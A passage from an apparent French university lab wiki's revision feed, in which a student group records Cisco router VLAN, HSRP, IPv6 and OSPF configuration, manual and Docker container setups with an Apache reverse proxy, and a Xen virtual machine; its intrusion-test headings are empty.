 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.9/29&amp;lt;/code&amp;gt; : Routeur 1&lt;br /&gt;
* &amp;lt;code&amp;gt;192.168.222.10/29&amp;lt;/code&amp;gt; : Routeur 2&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 (IPv4 Uniquement) =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248                      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration OSPF =====&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49100</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49100"/>
				<updated>2018-12-21T15:30:12Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* Configuration du VLAN 131 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
Cette commande s'applique aussi à eth1 pour le conteneur 1&lt;br /&gt;
&lt;br /&gt;
==Mise en place commutateur virtuel==&lt;br /&gt;
Création des interfaces liées&lt;br /&gt;
&lt;br /&gt;
iface_virt_X (interface virtuelle X) &amp;lt;-&amp;gt; iface_ns_X (interface namespace X)&lt;br /&gt;
&lt;br /&gt;
  ip link add iface_virt_1 type veth peer name iface_ns_1&lt;br /&gt;
  ip link add iface_virt_2 type veth peer name iface_ns_2&lt;br /&gt;
  ip link add iface_virt_3 type veth peer name iface_ns_3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création de notre propre pont&lt;br /&gt;
&lt;br /&gt;
  ip link add jdqb_bridge type bridge&lt;br /&gt;
&lt;br /&gt;
Ajout des parties des interfaces dans le commutateur&lt;br /&gt;
&lt;br /&gt;
  ip link set iface_virt_1 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_2 master jdqb_bridge&lt;br /&gt;
  ip link set iface_virt_3 master jdqb_bridge&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Activation des interfaces&lt;br /&gt;
  ip link set iface_virt_1 up&lt;br /&gt;
  ip link set iface_virt_2 up &lt;br /&gt;
  ip link set iface_virt_3 up  &lt;br /&gt;
&lt;br /&gt;
Activation du pont&lt;br /&gt;
  ip address add dev jdqb_bridge 192.168.0.1/24&lt;br /&gt;
&lt;br /&gt;
Montée du pont&lt;br /&gt;
  ip link set jdqb_bridge up&lt;br /&gt;
&lt;br /&gt;
Connexion des conteneurs à leur interface virtuelle respective&lt;br /&gt;
  ip link set iface_ns_1 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_2 netns /proc/&amp;lt;PID2&amp;gt;/ns/net name eth0&lt;br /&gt;
  ip link set iface_ns_3 netns /proc/&amp;lt;PID3&amp;gt;/ns/net name eth0&lt;br /&gt;
&lt;br /&gt;
Obtention des PIDs&lt;br /&gt;
  ps aux | grep unshare&lt;br /&gt;
&lt;br /&gt;
Quatrième interface, reliant le mandataire web inverse (conteneur 1) et le bridge de zabeth09&lt;br /&gt;
  ip link add iface_virt_0 type veth peer name iface_ns_0&lt;br /&gt;
  ip link set iface_virt_0 master bridge&lt;br /&gt;
  ip link set iface_virt_0 up&lt;br /&gt;
  ip link set iface_ns_0 netns /proc/&amp;lt;PID1&amp;gt;/ns/net name eth1&lt;br /&gt;
&lt;br /&gt;
==Modification de la table IP==&lt;br /&gt;
&lt;br /&gt;
  iptables -F&lt;br /&gt;
  iptables -F -t nat&lt;br /&gt;
  iptables -P FORWARD ACCEPT&lt;br /&gt;
&lt;br /&gt;
Attribution des adresses aux conteneurs&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth0 192.168.0.91/24&lt;br /&gt;
  nsenter -t &amp;lt;PID2&amp;gt; -n ip address add dev eth0 192.168.0.92/24&lt;br /&gt;
  nsenter -t &amp;lt;PID3&amp;gt; -n ip address add dev eth0 192.168.0.93/24&lt;br /&gt;
&lt;br /&gt;
  nsenter -t &amp;lt;PID1&amp;gt; -n ip address add dev eth1 172.26.145.90/24&lt;br /&gt;
&lt;br /&gt;
==Mandataire inverse==&lt;br /&gt;
===Configuration Apache2===&lt;br /&gt;
&lt;br /&gt;
Afin de configurer notre premier conteneur en mandataire inverse, nous modifions le fichier : /etc/apache2/sites-available/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons : &lt;br /&gt;
  &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
  ...  &lt;br /&gt;
  ProxyPass /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPassReverse /site1 http://192.168.0.92/&lt;br /&gt;
  ProxyPass /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyPassReverse /site2 http://192.168.0.93/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
  ...&lt;br /&gt;
  &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Configuration réseau===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ajout de la route par défaut (Polytech) : &lt;br /&gt;
  ip route add default via 172.26.145.254&lt;br /&gt;
&lt;br /&gt;
Configuration eth1 : &lt;br /&gt;
  ip add add dev eth1 172.26.145.90/24&lt;br /&gt;
  ip link set eth1 up&lt;br /&gt;
&lt;br /&gt;
11h25 =&amp;gt; Serveurs Web unshare OK&lt;br /&gt;
 &lt;br /&gt;
=Création des conteneurs via Docker=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Instructions''Texte italique''==&lt;br /&gt;
docker run -i -t debian&lt;br /&gt;
&lt;br /&gt;
export http&lt;br /&gt;
&lt;br /&gt;
apt-get install apache nano vi&lt;br /&gt;
&lt;br /&gt;
En dehors conteneur docker commit &amp;lt;image name&amp;gt; sur le conteneur&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Creer réseau privé docker network create&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
(2X)docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau&lt;br /&gt;
docker run -i -t &amp;lt;image name&amp;gt; --net nom réseau -p 80:80&lt;br /&gt;
&lt;br /&gt;
DNS : vérifier les @IP des conteneurs&lt;br /&gt;
LE mandataire inverse doit avoir @IP de zabeth&lt;br /&gt;
&lt;br /&gt;
==Procédure==&lt;br /&gt;
Modification des paramètres de docker dans /etc/default/docker, commenter la ligne DOCKER_EPTS=&amp;quot;--iptables=false&amp;quot;&lt;br /&gt;
&lt;br /&gt;
  iptables-save&lt;br /&gt;
  service docker restart&lt;br /&gt;
&lt;br /&gt;
  docker run -i -t debian /bin/bash&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur&lt;br /&gt;
  export http_proxy&lt;br /&gt;
  export https_proxy&lt;br /&gt;
&lt;br /&gt;
  apt-get update&lt;br /&gt;
  apt-get install apache2 nano vim&lt;br /&gt;
&lt;br /&gt;
Récupération ID du docker&lt;br /&gt;
  docker ps&lt;br /&gt;
&lt;br /&gt;
Commit sur le docker&lt;br /&gt;
  docker commit &amp;lt;ID&amp;gt; apache2&lt;br /&gt;
&lt;br /&gt;
Création du network&lt;br /&gt;
  docker network create jdqb_network&lt;br /&gt;
&lt;br /&gt;
Lancement des conteneurs&lt;br /&gt;
  docker run -i -t --net jdqb_network apache2 &lt;br /&gt;
  docker run -i -t --net jdqb_network apache2&lt;br /&gt;
  docker run -i -t --net jdqb_network -p 80:80 apache2&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
  ip a&lt;br /&gt;
&lt;br /&gt;
Dans le conteneur mandataire&lt;br /&gt;
  nano /etc/apache2/sites-enabled/000-default.conf&lt;br /&gt;
&lt;br /&gt;
Ajout des proxypass&lt;br /&gt;
&lt;br /&gt;
  ProxyPass /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site1 http://&amp;lt;IP conteneur 1&amp;gt;/&lt;br /&gt;
  ProxyPass /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyPassReverse /site2 http://&amp;lt;IP conteneur 2&amp;gt;/&lt;br /&gt;
  ProxyRequests Off&lt;br /&gt;
&lt;br /&gt;
Ajout d'un DNS dans GANDI @plil.space&lt;br /&gt;
&lt;br /&gt;
Type A , TTL 1800, nom jdqb-docker, &amp;lt;ip bridge zabeth&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur les trois conteneurs&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
10h20 Serveurs Web (docker) OK&lt;br /&gt;
&lt;br /&gt;
=TP PRA - Mise en place du routeur Catalyst 3650=&lt;br /&gt;
&lt;br /&gt;
* Sujet : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html Lien - rex.plil.fr]&lt;br /&gt;
&lt;br /&gt;
== Déroulement des Séances ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Séance 1 : 26/11/2018===&lt;br /&gt;
&lt;br /&gt;
Nous avons à notre disposition l'adresse IPV4 routée 193.48.57.160/27.&lt;br /&gt;
&lt;br /&gt;
Nous disposons également de l'adresse IPV4 non routée 10.60.0.0/16.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage réseau IPV4 routé en deux sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous divisons l'IPV4 routée en deux sous réseaux.&lt;br /&gt;
&lt;br /&gt;
Pour réaliser leur TP, les IMA2A5 ont utilisés les adresses comprises entre 193.48.57.160/28 et 193.48.57.175/28.&lt;br /&gt;
&lt;br /&gt;
Nous utiliserons donc le second sous réseau : 193.48.57.176/28 à 193.48.57.191/28.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Par conséquent l'adresse IP du routeur 1 est 193.48.57.188/28&lt;br /&gt;
&lt;br /&gt;
Celle du routeur 2 est 193.48.57.189/28&lt;br /&gt;
&lt;br /&gt;
Et enfin le routeur virtuel, pour la diffusion entre routeurs, est 193.48.57.190/28&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Découpage du réseau IPV4 non routée en sous réseaux====&lt;br /&gt;
&lt;br /&gt;
Nous découpons notre réseau en 254 sous réseaux disponibles. Les IMA2A5 ont utilisés les 5 premiers 10.60.1.0/24 à 10.60.5.0/24 .&lt;br /&gt;
&lt;br /&gt;
Nous prendrons donc les adresses entre 10.60.11.0/24 et 10.60.21.0/24 .&lt;br /&gt;
&lt;br /&gt;
Ces adresses seront routées vers les adresses comprises entre 193.48.57.177/28 et 193.48.57.187/28 .&lt;br /&gt;
&lt;br /&gt;
===Séance 2 : 27/11/2018===&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur Catalyst 3560&lt;br /&gt;
&lt;br /&gt;
====Mise en place du routeur et connexion à celui ci====&lt;br /&gt;
La configuration du routeur se fera via minicom.&lt;br /&gt;
&lt;br /&gt;
Vérification de l'interface à utiliser :&lt;br /&gt;
&lt;br /&gt;
  ls /dev/ | grep ttyUSB&lt;br /&gt;
&lt;br /&gt;
Notre routeur est connecté sur ttyUSB0.&lt;br /&gt;
&lt;br /&gt;
  minicom -os&lt;br /&gt;
&lt;br /&gt;
Les paramètres de configuration de minicom sont les suivants : &lt;br /&gt;
&lt;br /&gt;
- port /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
- baud 9600&lt;br /&gt;
&lt;br /&gt;
- 8 bits&lt;br /&gt;
&lt;br /&gt;
- pas de bit de parité&lt;br /&gt;
&lt;br /&gt;
- 1 bit de stop&lt;br /&gt;
&lt;br /&gt;
- pas de contrôle de flux&lt;br /&gt;
&lt;br /&gt;
====Configuration du routeur : Configuration des ports====&lt;br /&gt;
Passage en administrateur :&lt;br /&gt;
&lt;br /&gt;
  Router&amp;gt;enable&lt;br /&gt;
  Router#&lt;br /&gt;
&lt;br /&gt;
On liste les interfaces&lt;br /&gt;
&lt;br /&gt;
  Router#show interface status&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  Port      Name               Status       Vlan       Duplex    Speed   Type&lt;br /&gt;
  Gi0/1                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/2                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/3                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/4                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/5                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/6                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/7                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/8                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/9                        connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  Gi0/10                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 1&lt;br /&gt;
  &lt;br /&gt;
  Gi0/11                       connected    Trunk      a-full    a-100   10/100/1000BaseTX      // vers le commutateur 2 (en E306)&lt;br /&gt;
  &lt;br /&gt;
  // Non connecté&lt;br /&gt;
  [...interfaces Gi0/12-Gi0/48]&lt;br /&gt;
  &lt;br /&gt;
  // les fibres&lt;br /&gt;
  Te0/1                        notconnect   1          full      10G     10GBase-SR             // vers le local SR52&lt;br /&gt;
  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
